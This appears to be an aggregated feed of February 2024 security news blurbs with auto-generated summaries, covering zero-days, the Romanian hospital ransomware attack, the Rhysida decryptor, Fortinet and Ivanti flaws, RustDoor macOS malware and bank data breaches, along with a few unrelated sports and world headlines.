            Ensuring platform security is hard, but when a company the stature of Apple begins to ramp up protection of its ecosystem, every IT decision maker should pay attention. Unfortunately, this is precisely what's happening: Apple is now updating fundamental protection at a faster clip than it's ever done before.

            Apple’s security teams are alert

            That important revelation comes from Howard Oakley at the excellent Eclectic Light Company blog. He notes that in the six weeks ending Feb. 9, Apple has updated a Mac security feature called XProtect five times — introducing 11 new rules to the service.


            "

            Autosummary: Logically, good security practice also extends to the other common-sense risk-avoidance techniques: avoid clicking links you don’t trust, don’t open messages you don’t recognize, update system software frequently, never use the same password twice, and so forth. (It should.) To ensure your Mac is installing these XProtect updates, follow these steps: In macOS Ventura or later, open System Settings > General, open Software Update and click the info button beside Automatic Updates. He also advises that Mac users should never use torrented, cracked, or fake software, and that if they don’t trust the security and authenticity of any third-party software they should delete it. "


            Microsoft patches two zero-days exploited by attackers (CVE-2024-21412, CVE-2024-21351)

            exploits
            2024-02-13 https://www.helpnetsecurity.com/2024/02/13/cve-2024-21412-cve-2024-21351/

            On February 2024 Patch Tuesday, Microsoft has delivered fixes for 72 CVE-numbered vulnerabilities, including two zero-days (CVE-2024-21412, CVE-2024-21351) that are being leveraged by attackers in the wild. About CVE-2024-21412 and CVE-2024-21351 CVE-2024-21412 allows attackers to bypass the Microsoft Defender SmartScreen security feature with booby-trapped Internet Shortcut files. In late December 2023, Trend Micro researcher Peter Girnus and his colleagues in the ZDI Threat Hunting team discovered the Water Hydra APT leveraging the flaw to infect … More

            The post Microsoft patches two zero-days exploited by attackers (CVE-2024-21412, CVE-2024-21351) appeared first on Help Net Security.

            "

            Autosummary: The researchers created a proof-of-concept (PoC) for further testing, and discovered that the initial shortcut bypassed the patch for CVE-2023-36025 and evaded SmartScreen protections, “which failed to properly apply Mark-of-the-Web (MotW), a critical Windows component that alerts users when opening or running files from an untrusted source.” "


            Bank of America customer data compromised after a third-party services provider data breach

            financial
            2024-02-13 https://securityaffairs.com/159085/data-breach/bank-of-america-third-party-services-data-breach.html
            Bank of America revealed that the personal information of some customers was stolen in a data breach affecting a third-party services provider. Bank of America began notifying some customers following a data breach at the third-party services provider Infosys McCamish System (IMS). The bank has sent notification letters to 57,000 customers, informing them that their […] "

            Autosummary: According to the financial institution, exposed data may include first and last name, address, business email address, date of birth, Social Security number, and other account information. "


            Ransomware hits dozens of Romanian hospitals

            exploits
            2024-02-13 https://www.bbc.co.uk/news/technology-68288150
            Over 100 facilities have been affected with some doctors resorting to pen and paper. "

            Autosummary: "


            Prudential Financial breached in data theft cyberattack

            financial ciber
            2024-02-13 https://www.bleepingcomputer.com/news/security/prudential-financial-breached-in-data-theft-cyberattack/
            Prudential Financial has disclosed that its network was breached last week, with the attackers stealing employee and contractor data before being blocked from compromised systems one day later. [...] "

            Autosummary: "


            A ransomware attack took 100 Romanian hospitals down

            exploits ransomware
            2024-02-13 https://securityaffairs.com/159093/cyber-crime/romanian-hospitals-ransomware-attack.html
            Authorities in Romania reported that at least 100 hospitals went offline after a ransomware attack hit the Hipocrate platform. Authorities in Romania confirmed that a ransomware attack that targeted the Hipocrate Information System (HIS) has disrupted operations for at least 100 hospitals. Hipocrate Information System (HIS) is a software suite designed to manage the medical […] "

            Autosummary: Stopping it will remove the evidence stored in the volatile memory (RAM). Collect and keep all relevant log information, from the affected equipment but also from network equipment and firewalls. Examine the system logs to identify the mechanism by which the IT infrastructure has been compromised. Immediately inform all employees and notify affected customers and business partners of the incident and its extent. Restore affected systems based on data backups after a full system cleanup has been performed. "


            Remote Monitoring & Management software used in phishing attacks

            financial
            2024-02-13 https://www.malwarebytes.com/blog/threat-intelligence/2024/02/remote-monitoring-management-software-used-in-phishing-attacks
            Threat actors are abusing commercial remote software like AnyDesk to phish users and defraud them. "

            Autosummary: Indicators of Compromise, phishing domains: uk-barclaysliveteam[.]com, barclaysbusinesslivechat[.]com, boi-bb-onlineservice[.]com, santanderbusiness-helpcentre[.]com. Try ThreatDown bundles today: For IT teams plagued by the triad of complex deployment, scattered tooling, and excessive alert noise, ThreatDown bundles emerge as a superior solution that caters to the needs of today’s security teams. Remote Monitoring & Management (RMM) software, including popular tools like AnyDesk, Atera, and Splashtop, are invaluable for IT administrators today, streamlining tasks and ensuring network integrity from afar. "


            Ransomware tactics evolve, become scrappier

            exploits industry
            2024-02-12 https://www.helpnetsecurity.com/2024/02/12/ransomware-attacks-rise/

            As we enter 2024, ransomware remains the most significant cyberthreat facing businesses, according to Malwarebytes. Malwarebytes reveals that the United States accounted for almost half of all ransomware attacks in 2023. “Small and medium-sized organizations face a deluge of cyber threats daily including ransomware, malware and phishing attacks. This new data spotlights the pervasive cat-and-mouse game between cybercriminals and the security and IT teams on the front lines,” said Mark Stockley, Cybersecurity Evangelist, Malwarebytes ThreatDown … More

            The post Ransomware tactics evolve, become scrappier appeared first on Help Net Security.

            "

            Autosummary: The repeated use of zero-days also signaled a new level of sophistication making CL0P the second most active “big game” ransomware group of 2023, outpacing rivals that were active in every month of the year compared to just a few weeks of activity from CL0P. Lockbit also remained the most widely used ransomware-as-a-service, which accounted for more than twice as many attacks as its nearest competitor in 2023. "


            SiCat: Open-source exploit finder

            exploits
            2024-02-12 https://www.helpnetsecurity.com/2024/02/12/sicat-open-source-exploit-finder/

            SiCat is an open-source tool for exploit research designed to source and compile information about exploits from open channels and internal databases. Its primary aim is to assist in cybersecurity, enabling users to search the internet for potential vulnerabilities and corresponding exploits. Akas Wisnu Aji, the creator of SiCat, outlined the key features of the tool: Performing exploit searches based on desired inputs and sources such as Exploit-DB, Exploit Alert, Packetstorm Security, NVD Database, and … More

            The post SiCat: Open-source exploit finder appeared first on Help Net Security.




            2024 cybersecurity outlook: A wave of global threats on the horizon

            ciber
            2024-02-12 https://www.helpnetsecurity.com/2024/02/12/cybersecurity-predictions-challenges-2024-video/

            2024 is expected to witness a surge in cyberattacks driven by global events and the widespread accessibility of advanced technologies. In this Help Net Security round-up, we present segments from previously recorded videos where cybersecurity experts discuss predictions for 2024, providing a comprehensive perspective on the challenges and opportunities awaiting organizations. Complete videos Dara Gibson, Senior Cyber Insurance Manager at Optiv, discusses cyber insurance and what we should expect to see in 2024. Fei Huang, … More

            The post 2024 cybersecurity outlook: A wave of global threats on the horizon appeared first on Help Net Security.




            U.S. Offers $10 Million Bounty for Info Leading to Arrest of Hive Ransomware Leaders

            exploits ransomware
            2024-02-12 https://thehackernews.com/2024/02/us-offers-10-million-bounty-for-info.html
The U.S. Department of State has announced monetary rewards of up to $10 million for information about individuals holding key positions within the Hive ransomware operation. It is also giving away an additional $5 million for specifics that could lead to the arrest and/or conviction of any person "conspiring to participate in or attempting to participate in Hive ransomware activity."

Autosummary: Palo Alto Networks Unit 42, in its own analysis of ransomware gangs' public listings of victims on dark web sites, called out manufacturing as the most impacted industry vertical in 2023, followed by professional and legal services, high technology, retail, construction, and healthcare sectors. Besides a notable shift to big game hunting, which refers to the tactic of targeting very large companies to extract hefty ransoms, ransom payments are being steadily routed through cross-chain bridges, instant exchangers, and gambling services, indicating that e-crime groups are slowly moving away from centralized exchanges and mixers in pursuit of new avenues for money laundering.


            Brazil miss out on Olympics as Argentina win to qualify

            latam industry
            2024-02-12 https://www.bbc.co.uk/sport/football/68270697
Two-time gold medallists Brazil will not feature in the Olympic men's football event for the first time since 2004 after losing to Argentina.



            Integrating cybersecurity into vehicle design and manufacturing

            industry ciber
            2024-02-12 https://www.helpnetsecurity.com/2024/02/12/yaron-edan-ree-automotive-electric-vehicles-cybersecurity/

            In this Help Net Security interview, Yaron Edan, CISO at REE Automotive, discusses the cybersecurity landscape of the automotive industry, mainly focusing on electric and connected vehicles. Edan highlights the challenges of technological advancements and outlines strategies for automakers to address cyber threats effectively. Additionally, he emphasizes the importance of consumer awareness in ensuring vehicle security. Can you describe the state of cybersecurity in the automotive industry, especially in the context of electric and connected … More

            The post Integrating cybersecurity into vehicle design and manufacturing appeared first on Help Net Security.


Autosummary: Now that our vehicles are becoming increasingly connected to the internet, can go through Over-the-Air (OTA) updates, use remote management, contain Advanced Driver Assistance Systems (ADAS), and employ AI, the potential avenues for cyberattacks have expanded for threat actors to exploit in a significant way. Once an automaker is compliant with certain regulatory rules, they will then ask the regulatory bodies to come to conduct an onsite visit, where they conduct an audit for months at a time, trying to hack each layer they can and look for any areas of weakness, to identify what needs to be patched up. Implement strong network security measures, including firewalls, detection systems, and encryption, to monitor your network traffic for any anomalies regularly.


            Microsoft Introduces Linux-Like "sudo" Command to Windows 11

            Linux
            2024-02-12 https://thehackernews.com/2024/02/microsoft-introduces-linux-like-sudo.html
Microsoft said it's introducing Sudo for Windows 11 as part of an early preview version to help users execute commands with administrator privileges. "Sudo for Windows is a new way for users to run elevated commands directly from an unelevated console session," Microsoft Product Manager Jordi Adoumie said. "It is an ergonomic and familiar solution for users who want to elevate a command …"



            Ransomware attack forces 18 Romanian hospitals to go offline

            exploits
            2024-02-12 https://www.bleepingcomputer.com/news/security/ransomware-attack-forces-18-romanian-hospitals-to-go-offline/
At least 18 hospitals in Romania were knocked offline after a ransomware attack took down their healthcare management system. [...]

Autosummary: Affected hospitals (partial list): Trestioreanu” Institute Bucharest (IOB); Military Emergency Hospital “Dr. Alexandru Gafencu” Constanta; Sighetu Marmației Municipal Hospital; Targoviste Emergency County Hospital; C.F. Clinical Hospital no. 2 Bucharest; Fundeni Clinical Institute; Iasi Regional Institute of Oncology (IRO Iasi); Buzău County Emergency Hospital; Slobozia County Emergency Hospital; Institute of Cardiovascular Diseases Timișoara; Hospital for Chronic Diseases Sf.


            Decryptor for Rhysida ransomware is available!

            exploits ransomware
            2024-02-12 https://www.helpnetsecurity.com/2024/02/12/rhysida-ransomware-decryptor/

Files encrypted by Rhysida ransomware can be successfully decrypted, due to an implementation vulnerability discovered by Korean researchers and leveraged to create a decryptor. Rhysida and its ransomware: Rhysida is a relatively new ransomware-as-a-service gang that engages in double extortion. First observed in May 2023, it made its name by attacking the British Library, the Chilean Army, healthcare delivery organizations, and Holding Slovenske Elektrarne (HSE). According to Check Point Research, the Rhysida ransomware group may … More

            The post Decryptor for Rhysida ransomware is available! appeared first on Help Net Security.




            ExpressVPN leaked DNS requests due to a bug in the split tunneling feature

            exploits
            2024-02-12 https://securityaffairs.com/159010/security/expressvpn-dns-requests-leak.html
A bug in the split tunneling feature implemented in ExpressVPN exposed the domains visited by the users. ExpressVPN addressed a bug in the split tunneling feature that exposed the domains visited by the users to configured DNS servers. The company opted to temporarily remove the feature in the Windows app to address the issue. The […]

Autosummary: By Pierluigi Paganini, February 12, 2024.


            Hackers exploit Ivanti SSRF flaw to deploy new DSLog backdoor

            exploits
            2024-02-12 https://www.bleepingcomputer.com/news/security/hackers-exploit-ivanti-ssrf-flaw-to-deploy-new-dslog-backdoor/
Hackers are exploiting a server-side request forgery (SSRF) vulnerability in Ivanti Connect Secure, Policy Secure, and ZTA gateways to deploy the new DSLog backdoor on vulnerable devices. [...]

Autosummary: The updates that fix the problem are Ivanti Connect Secure versions 9.1R14.4, 9.1R17.2, 9.1R18.3, 22.4R2.2, 22.5R1.1 and 22.5R2.2, Ivanti Policy Secure version 22.5R1.1, and ZTA version 22.6R1.3.


            Free Rhysida ransomware decryptor for Windows exploits RNG flaw

            exploits ransomware
            2024-02-12 https://www.bleepingcomputer.com/news/security/free-rhysida-ransomware-decryptor-for-windows-exploits-rng-flaw/
South Korean researchers have publicly disclosed an encryption flaw in the Rhysida ransomware encryptor, allowing the creation of a Windows decryptor to recover files for free. [...]

Autosummary: South Korean researchers, including employees of the Korean Internet & Security Agency (KISA), examining Rhysida found an implementation vulnerability in the ransomware's encryption scheme, specifically the random number generator (CSPRNG) that helps generate the unique private (encryption) key in each attack.


            Ransomware attack forces 21 Romanian hospitals to go offline

            exploits
            2024-02-12 https://www.bleepingcomputer.com/news/security/ransomware-attack-forces-21-romanian-hospitals-to-go-offline/
At least 21 hospitals in Romania were knocked offline after a ransomware attack took down their healthcare management system. [...]

Autosummary: Affected hospitals (partial list): Apostol Andrei” Emergency County Clinical Hospital Constanta; Pitești County Emergency Hospital; Military Emergency Hospital “Dr. Alexandru Gafencu” Constanta; Institute of Cardiovascular Diseases Timișoara; Emergency County Hospital “Dr. Constantin Opriș” Baia Mare; Sighetu Marmației Municipal Hospital; Târgoviște County Emergency Hospital; Colțea Clinical Hospital; Medgidia Municipal Hospital; Fundeni Clinical Institute; Oncological Institute “Prof. Dr. Al.


            Bugcrowd raises $102 million to boost AI-powered crowdsourced security platform

            exploits
            2024-02-12 https://www.helpnetsecurity.com/2024/02/12/bugcrowd-funding-102-million/

            Bugcrowd has secured $102 million in strategic growth funding to scale its AI-powered crowdsourced security platform offerings globally. Led by General Catalyst, with participation from longtime existing investors Rally Ventures and Costanoa Ventures, this funding round underscores investor confidence in the company’s leadership position in the crowdsourced security market. The additional capital enables Bugcrowd to accelerate growth across EMEA, APAC, and the United States, fund continued innovation into the Bugcrowd Platform, and leverage opportunities for … More

            The post Bugcrowd raises $102 million to boost AI-powered crowdsourced security platform appeared first on Help Net Security.


Autosummary: “Since its inception, Bugcrowd has delivered innovative solutions with a tangible and meaningful impact on enhancing cyber safety and we have had the privilege of being involved since the early days. With this new funding, Bugcrowd will have the ability to further scale up their platform, expand their global network of hackers, and deliver more value to their customers and the security community at large,” said David Fairman, Netskope APAC Chief Information Officer & Chief Security Officer and Bugcrowd Advisory Board Member.


            Rhysida Ransomware Cracked, Free Decryption Tool Released

            exploits ransomware
            2024-02-12 https://thehackernews.com/2024/02/rhysida-ransomware-cracked-free.html
Cybersecurity researchers have uncovered an "implementation vulnerability" that has made it possible to reconstruct encryption keys and decrypt data locked by Rhysida ransomware. The findings were published last week by a group of researchers from Kookmin University and the Korea Internet and Security Agency (KISA). "Through a comprehensive analysis of Rhysida Ransomware, we identified an …"

Autosummary: Using these observations as reference points, the researchers said they were able to retrieve the initial seed for decrypting the ransomware, determine the "randomized" order in which the files were encrypted, and ultimately recover the data without having to pay a ransom.


            CISA: Roundcube email server bug now exploited in attacks

            exploits
            2024-02-12 https://www.bleepingcomputer.com/news/security/cisa-roundcube-email-server-bug-now-exploited-in-attacks/
CISA warns that a Roundcube email server vulnerability patched in September is now actively exploited in cross-site scripting (XSS) attacks. [...]

Autosummary: [Figure: Internet-exposed Roundcube servers (Shodan)] Another Roundcube flaw, a stored cross-site scripting (XSS) vulnerability tracked as CVE-2023-5631, was targeted as a zero-day by the Winter Vivern (aka TA473)


            Ransomware review: February 2024

            exploits
            2024-02-12 https://www.malwarebytes.com/blog/threat-intelligence/2024/02/ransomware-review-february-2024
In January, we recorded a total of 261 ransomware victims.

Autosummary: [Charts: Known ransomware attacks by gang, January 2024; Known ransomware attacks by country, January 2024; Known ransomware attacks by industry sector, January 2024] In other January news, the UK’s National Cybersecurity Centre (NCSC) released a report suggesting that AI will boost ransomware attack volume and severity in the next two years, particularly through lowering the entry barrier for novice hackers. ThreatDown’s select bundles offer: [Screenshots: ThreatDown EDR detecting LockBit ransomware; ThreatDown automatically quarantining LockBit ransomware] For resource-constrained organizations, select ThreatDown bundles offer Managed Detection and Response (MDR) services, providing expert monitoring and swift threat response to ransomware threats—without the need for large in-house cybersecurity teams. AI may introduce new methods and techniques for cybercriminals, to be sure, but the core principles of ransomware gangs—based on access, leverage, and profit—will likely continue unchanged for the foreseeable future.


            If only you had to worry about malware, with Jason Haddix: Lock and Code S05E04

            exploits
            2024-02-12 https://www.malwarebytes.com/blog/podcast/2024/02/if-only-you-had-to-worry-about-malware-with-jason-haddix-lock-and-code-s05e04
This week on the Lock and Code podcast, we speak with Jason Haddix about how businesses can protect against modern cyberthreats.

Autosummary: In 2024, the modern cyberattack is a segmented, prolonged, and professional effort, in which specialists create strictly financial alliances to plant malware on unsuspecting employees, steal corporate credentials, slip into business networks, and, for a period of days if not weeks, simply sit and watch and test and prod, escalating their privileges while refraining from installing any noisy hacking tools that could be flagged by detection-based antivirus scans.


            Critical Fortinet FortiOS flaw exploited in the wild (CVE-2024-21762)

            exploits
            2024-02-12 https://www.helpnetsecurity.com/2024/02/12/critical-fortinet-fortios-flaw-exploited-in-the-wild-cve-2024-21762/

Fortinet has patched critical remote code execution vulnerabilities in FortiOS (CVE-2024-21762, CVE-2024-23313), one of which is “potentially” being exploited in the wild. CISA has confirmed the in-the-wild exploitation by adding it to its Known Exploited Vulnerabilities (KEV) catalog, though details about the attacks are still undisclosed. About the vulnerabilities (CVE-2024-21762, CVE-2024-23313): CVE-2024-21762 is an out-of-bounds write vulnerability in FortiOS, which may allow a remote unauthenticated attacker to execute arbitrary code or command via specially … More

            The post Critical Fortinet FortiOS flaw exploited in the wild (CVE-2024-21762) appeared first on Help Net Security.




            CISA adds Roundcube Webmail Persistent XSS bug to its Known Exploited Vulnerabilities catalog

            exploits
            2024-02-12 https://securityaffairs.com/159032/hacking/cisa-adds-roundcube-xss-known-exploited-vulnerabilities-catalog.html
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Roundcube Webmail Persistent Cross-Site Scripting (XSS) Vulnerability to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a Roundcube Webmail Persistent Cross-Site Scripting (XSS) vulnerability, tracked as CVE-2023-43770, to its Known Exploited Vulnerabilities (KEV) catalog. Roundcube is an open-source web-based email client. It […]

Autosummary: By Pierluigi Paganini, February 12, 2024.


            Bank of America warns customers of data breach after vendor hack

            financial
            2024-02-12 https://www.bleepingcomputer.com/news/security/bank-of-america-warns-customers-of-data-breach-after-vendor-hack/
Bank of America is warning customers of a data breach exposing their personal information after one of its service providers was hacked last year. [...]



            FBI seizes Warzone RAT infrastructure, arrests malware vendor

            exploits
            2024-02-12 https://www.bleepingcomputer.com/news/security/fbi-seizes-warzone-rat-infrastructure-arrests-malware-vendor/
The FBI dismantled the Warzone RAT malware operation, seizing infrastructure and arresting two individuals associated with the cybercrime operation. [...]



            FCC orders telecom carriers to report PII data breaches within 30 days

            financial Telcos
            2024-02-12 https://www.bleepingcomputer.com/news/security/fcc-orders-telecom-carriers-to-report-pii-data-breaches-within-30-days/
Starting March 13th, telecommunications companies must report data breaches impacting customers' personally identifiable information within 30 days, as required by FCC's updated data breach reporting requirements. [...]

Autosummary: The updated data breach reporting rules aim to ensure that "providers of telecommunications, interconnected Voice over Internet Protocol (VoIP), and telecommunications relay services (TRS) are held accountable in their obligations to safeguard sensitive customer information, and to provide customers with the tools needed to protect themselves in the event that their data is compromised."


            20+ hospitals in Romania hit hard by ransomware attack on IT service provider

            exploits ransomware Telcos
            2024-02-12 https://grahamcluley.com/20-hospitals-in-romania-hit-hard-by-ransomware-attack-on-it-service-provider/
Over 20 hospitals in Bucharest have reportedly been impacted by a ransomware attack after cybercriminals targeted an IT service provider. As a consequence, medical staff have been forced to use pen-and-paper rather than computer systems.

Autosummary: Affected hospitals include: Azuga Orthopaedics and Traumatology Hospital; Băicoi City Hospital; Buzău County Emergency Hospital; C.F. Clinical Hospital no. 2 Bucharest; Colțea Clinical Hospital; Emergency County Hospital “Dr. Constantin Opriș” Baia Mare; Emergency Hospital for Plastic, Reconstructive and Burn Surgery Bucharest; Fundeni Clinical Institute; Hospital for Chronic Diseases Sf.


            Researchers released a free decryption tool for the Rhysida Ransomware

            exploits ransomware
            2024-02-12 https://securityaffairs.com/159031/cyber-crime/rhysida-ransomware-decryption-tool.html
Researchers discovered a vulnerability in the code of the Rhysida ransomware that allowed them to develop a decryption tool. Cybersecurity researchers from Kookmin University and the Korea Internet and Security Agency (KISA) discovered an implementation vulnerability in the source code of the Rhysida ransomware. The experts exploited the vulnerability to reconstruct encryption keys and developed […]

Autosummary: The ransomware gang hit organizations in multiple industries, including the education, healthcare, manufacturing, information technology, and government sectors. By Pierluigi Paganini, February 12, 2024.


            Ransomware attack forces 25 Romanian hospitals to go offline

            exploits
            2024-02-12 https://www.bleepingcomputer.com/news/security/ransomware-attack-forces-25-romanian-hospitals-to-go-offline/
Over two dozen hospitals in Romania have taken their systems offline after a ransomware attack took down their healthcare management system. [...]

Autosummary: Affected hospitals (partial list): Luca; C.F. Clinical Hospital no. 2 Bucharest; Medical Centre MALP SRL Moinești; Institute of Phonoaudiology and ENT Functional Surgery “Prof. Dr. D. Hociotă”, Bucharest, Romania; Brad Pneumonology Sanatorium, Hunedoara; Hospital of Pneumonology Rosiorii de Vede; Băicoi City Hospital; Sante Clinic Calarasi. Back to paper: since the systems were taken offline or shut down, doctors have been forced to return to writing prescriptions and keeping records on paper.


            Ransomware attack forces 100 Romanian hospitals to go offline

            exploits
            2024-02-12 https://www.bleepingcomputer.com/news/security/ransomware-attack-forces-100-romanian-hospitals-to-go-offline/
100 hospitals across Romania have taken their systems offline after a ransomware attack hit their healthcare management system. [...]

Autosummary: "Most of the affected hospitals have backups of data on the affected servers, with data saved relatively recently (1-2-3 days ago) except one, whose data was saved 12 days ago," DNSC said.


            ExpressVPN bug has been leaking some DNS requests for years

            exploits
            2024-02-11 https://www.bleepingcomputer.com/news/security/expressvpn-bug-has-been-leaking-some-dns-requests-for-years/
ExpressVPN has removed the split tunneling feature from the latest version of its software after finding that a bug exposed the domains users were visiting to configured DNS servers. [...]

Autosummary: The bug was introduced in ExpressVPN Windows versions 12.23.1 – 12.72.0, published between May 19, 2022, and Feb. 7, 2024, and only affected those using the split tunneling feature.


            Week in review: 10 must-read cybersecurity books, AnyDesk hack, Patch Tuesday forecast

            ciber
            2024-02-11 https://www.helpnetsecurity.com/2024/02/11/week-in-review-10-must-read-cybersecurity-books-anydesk-hack-patch-tuesday-forecast/

            Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: How CISOs navigate policies and access across enterprises In this Help Net Security interview, Marco Eggerling, Global CISO at Check Point, discusses the challenge of balancing data protection with diverse policies, devices, and access controls in a distributed enterprise. Enhancing adversary simulations: Learn the business to attack the business In this Help Net Security interview, Jamieson O’Reilly, Founder of DVULN, … More

            The post Week in review: 10 must-read cybersecurity books, AnyDesk hack, Patch Tuesday forecast appeared first on Help Net Security.


Autosummary: Prowler: Open-source security tool for AWS, Google Cloud Platform, Azure. Prowler is an open-source security tool designed to assess, audit, and enhance the security of AWS, GCP, and Azure.


            Raspberry Robin spotted using two new 1-day LPE exploits

            exploits
            2024-02-11 https://securityaffairs.com/158969/malware/raspberry-robin-1-day-exploits.html
Raspberry Robin continues to evolve: it was spotted using two new one-day exploits for vulnerabilities and Discord to host samples. Raspberry Robin is a Windows worm discovered by cybersecurity researchers from Red Canary; the malware propagates through removable USB devices. The malicious code uses Windows Installer to reach out to QNAP-associated domains and download a malicious […]

Autosummary: By Pierluigi Paganini, February 11, 2024. The researchers conclude that Raspberry Robin operators have purchased the 1-day exploits from an exploit developer for the following reasons: “The exploits are used as an external 64-bit executable. …”


            Pope and Milei meet as Argentina gains first female saint

            latam
            2024-02-11 https://www.bbc.co.uk/news/world-latin-america-68268257
Argentine President Javier Milei had previously criticised the Pope's views on social justice.



            Trinidad and Tobago hit by mystery ship oil spill

            industry
            2024-02-11 https://www.bbc.co.uk/news/world-latin-america-68266339
At least 15km (nine miles) of Tobago's coast is already affected after a mysterious ship overturned.



            Raspberry Robin malware evolves with early access to Windows exploits

            exploits
            2024-02-10 https://www.bleepingcomputer.com/news/security/raspberry-robin-malware-evolves-with-early-access-to-windows-exploits/
Recent versions of the Raspberry Robin malware are stealthier and implement one-day exploits that are deployed only on systems that are susceptible to them. [...]

Autosummary: [Figure: Disclosure and exploitation timelines (Check Point)] Specifically, regarding CVE-2023-36802, which enables attackers to escalate their privileges to the SYSTEM level, Cyfirma reported that an exploit had been available for purchase on the Dark Web since February 2023, a full seven months before Microsoft acknowledged and addressed the issue. It has been associated with threat actors like EvilCorp, FIN11, TA505, the Clop ransomware gang, and other malware operations, but its creators and maintainers are unknown.


            CISA adds Fortinet FortiOS bug to its Known Exploited Vulnerabilities catalog

            exploits
            2024-02-10 https://securityaffairs.com/158955/hacking/cisa-fortinet-fortios-bug-known-exploited-vulnerabilities-catalog.html
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Fortinet FortiOS bug to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a Fortinet FortiOS Out-of-Bound write vulnerability, tracked as CVE-2024-21762, to its Known Exploited Vulnerabilities (KEV) catalog. This week Fortinet warned that the recently discovered critical remote code execution vulnerability in […]

Autosummary: Affected FortiOS versions and remediation:

FortiOS 7.6: not affected (not applicable)
FortiOS 7.4: 7.4.0 through 7.4.2 affected; upgrade to 7.4.3 or above
FortiOS 7.2: 7.2.0 through 7.2.6 affected; upgrade to 7.2.7 or above
FortiOS 7.0: 7.0.0 through 7.0.13 affected; upgrade to 7.0.14 or above
FortiOS 6.4: 6.4.0 through 6.4.14 affected; upgrade to 6.4.15 or above
FortiOS 6.2: 6.2.0 through 6.2.15 affected; upgrade to 6.2.16 or above
FortiOS 6.0: all 6.0 versions affected; migrate to a fixed release

According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog.


            macOS Backdoor RustDoor likely linked to Alphv/BlackCat ransomware operations

            exploits ransomware
            2024-02-10 https://securityaffairs.com/158942/malware/macos-backdoor-rustdoor.html
Bitdefender researchers linked a new macOS backdoor, named RustDoor, to the Black Basta and Alphv/BlackCat ransomware operations. Researchers from Bitdefender discovered a new macOS backdoor, dubbed RustDoor, which appears to be linked to ransomware operations Black Basta and Alphv/BlackCat. RustDoor is written in Rust language and supports multiple features. The malware impersonates a Visual Studio […]

Autosummary: By Pierluigi Paganini, February 10, 2024.


            China cancels Argentina games amid Messi backlash

            latam
            2024-02-10 https://www.bbc.co.uk/sport/football/68261461
Chinese officials call off two Argentina friendlies after Lionel Messi failed to turn out for Inter Miami in an exhibition match in Hong Kong.



            New RustDoor macOS malware impersonates Visual Studio update

            exploits
            2024-02-09 https://www.bleepingcomputer.com/news/security/new-rustdoor-macos-malware-impersonates-visual-studio-update/
A new Rust-based macOS malware spreading as a Visual Studio update to provide backdoor access to compromised systems uses infrastructure linked to the infamous ALPHV/BlackCat ransomware gang. [...]

Autosummary: The macOS backdoor is delivered under multiple names, including "zshrc2," "Previewers," "VisualStudioUpdater," "VisualStudioUpdater_Patch," "VisualStudioUpdating," "visualstudioupdate," and "DO_NOT_RUN_ChromeUpdates". Among the supported commands: …: pauses execution for a set time, possibly to evade detection or synchronize actions; upload: sends files to a remote server, used for exfiltrating stolen data. After infecting a system, the malware communicates with command and control (C2) servers using specific endpoints for registration, task execution, and data exfiltration.


            Ransomware in 2023 recap: 5 key takeaways

            exploits
            2024-02-09 https://www.malwarebytes.com/blog/threat-intelligence/2024/02/ransomware-in-2023-recap-5-key-takeaways
            2023 saw a 70% increase in ransomware attacks from 2022. "

            Autosummary: Our integrated solutions combine EP, VPM, and EDR technologies, tailored to your organization’s specific needs, including: ThreatDown EDR detecting LockBit ransomware; ThreatDown automatically quarantining LockBit ransomware. For resource-constrained organizations, select ThreatDown bundles offer Managed Detection and Response (MDR) services, providing expert monitoring and swift threat response to ransomware attacks, without the need for large in-house cybersecurity teams. Global ransomware attacks by month, 2022 vs 2023. Global ransomware attacks, 2022 vs 2023. Additionally, LockBit was responsible for 22% of all ransomware attacks in 2023, over half as much as the next top five gangs combined. "


            Ivanti urges customers to patch yet another critical vulnerability

            exploits
            2024-02-09 https://www.malwarebytes.com/blog/news/2024/02/ivanti-urges-customer-to-patch-yet-another-critical-vulnerability
            Ivanti has found yet another vulnerability in versions of Connect Secure, Policy Secure, and ZTA gateways. "

            Autosummary: A patch is available now for Ivanti Connect Secure (versions 9.1R14.5, 9.1R17.3, 9.1R18.4, 22.4R2.3, 22.5R1.2, 22.5R2.3 and 22.6R2.2), Ivanti Policy Secure (versions 9.1R17.3, 9.1R18.4 and 22.5R1.2) and ZTA gateways (versions 22.5R1.6, 22.6R1.5 and 22.6R1.7). "


            New Fortinet RCE bug is actively exploited, CISA confirms

            exploits
            2024-02-09 https://www.bleepingcomputer.com/news/security/new-fortinet-rce-bug-is-actively-exploited-cisa-confirms/
            CISA confirmed today that attackers are actively exploiting a critical remote code execution (RCE) bug patched by Fortinet on Thursday. [...] "

            Autosummary: "


            February 2024 Patch Tuesday forecast: Zero days are back and a new server too

            exploits
            2024-02-09 https://www.helpnetsecurity.com/2024/02/09/february-2024-patch-tuesday-forecast/

            January 2024 Patch Tuesday is behind us. A relatively light release from Microsoft with 39 CVEs addressed in Windows 10, 35 in Windows 11, and surprisingly no zero-day vulnerabilities from Microsoft to start the new year. January’s release was a bit unusual in that we didn’t have any updates for Office 2013 and Office 2016, only the online, click-to-run versions had a single-CVE update. That lull didn’t last long as the zero-day treadmill has started … More

            The post February 2024 Patch Tuesday forecast: Zero days are back and a new server too appeared first on Help Net Security.

            "

            Autosummary: Apple, Google, Ivanti, and Microsoft: The first zero-day announcements and some software releases from Apple, Google, Ivanti, and Microsoft have hit the streets. Hot features include an option to subscribe as needed through Azure Arc (which is also getting an update), some Active Directory storage and security updates, communications security updates with SMB over Quick UDP (QUIC), and hotpatching. January’s release was a bit unusual in that we didn’t have any updates for Office 2013 and Office 2016, only the online, click-to-run versions had a single-CVE update. "


            Cybersecurity teams recognized as key enablers of business goals

            ciber
            2024-02-09 https://www.helpnetsecurity.com/2024/02/09/cybersecurity-teams-trust-levels/

            97% of office workers across the UK and US trust their cybersecurity team’s ability to prevent or minimize damage from cyberattacks, according to CybSafe. The study examining attitudes towards cybersecurity teams within organizations has uncovered that despite minor issues around communication and processes, there are high levels of trust and appreciation amongst employees. It indicates how cybersecurity teams and professionals are increasingly viewed as a vital strategic function enabling both individuals and business success. The … More

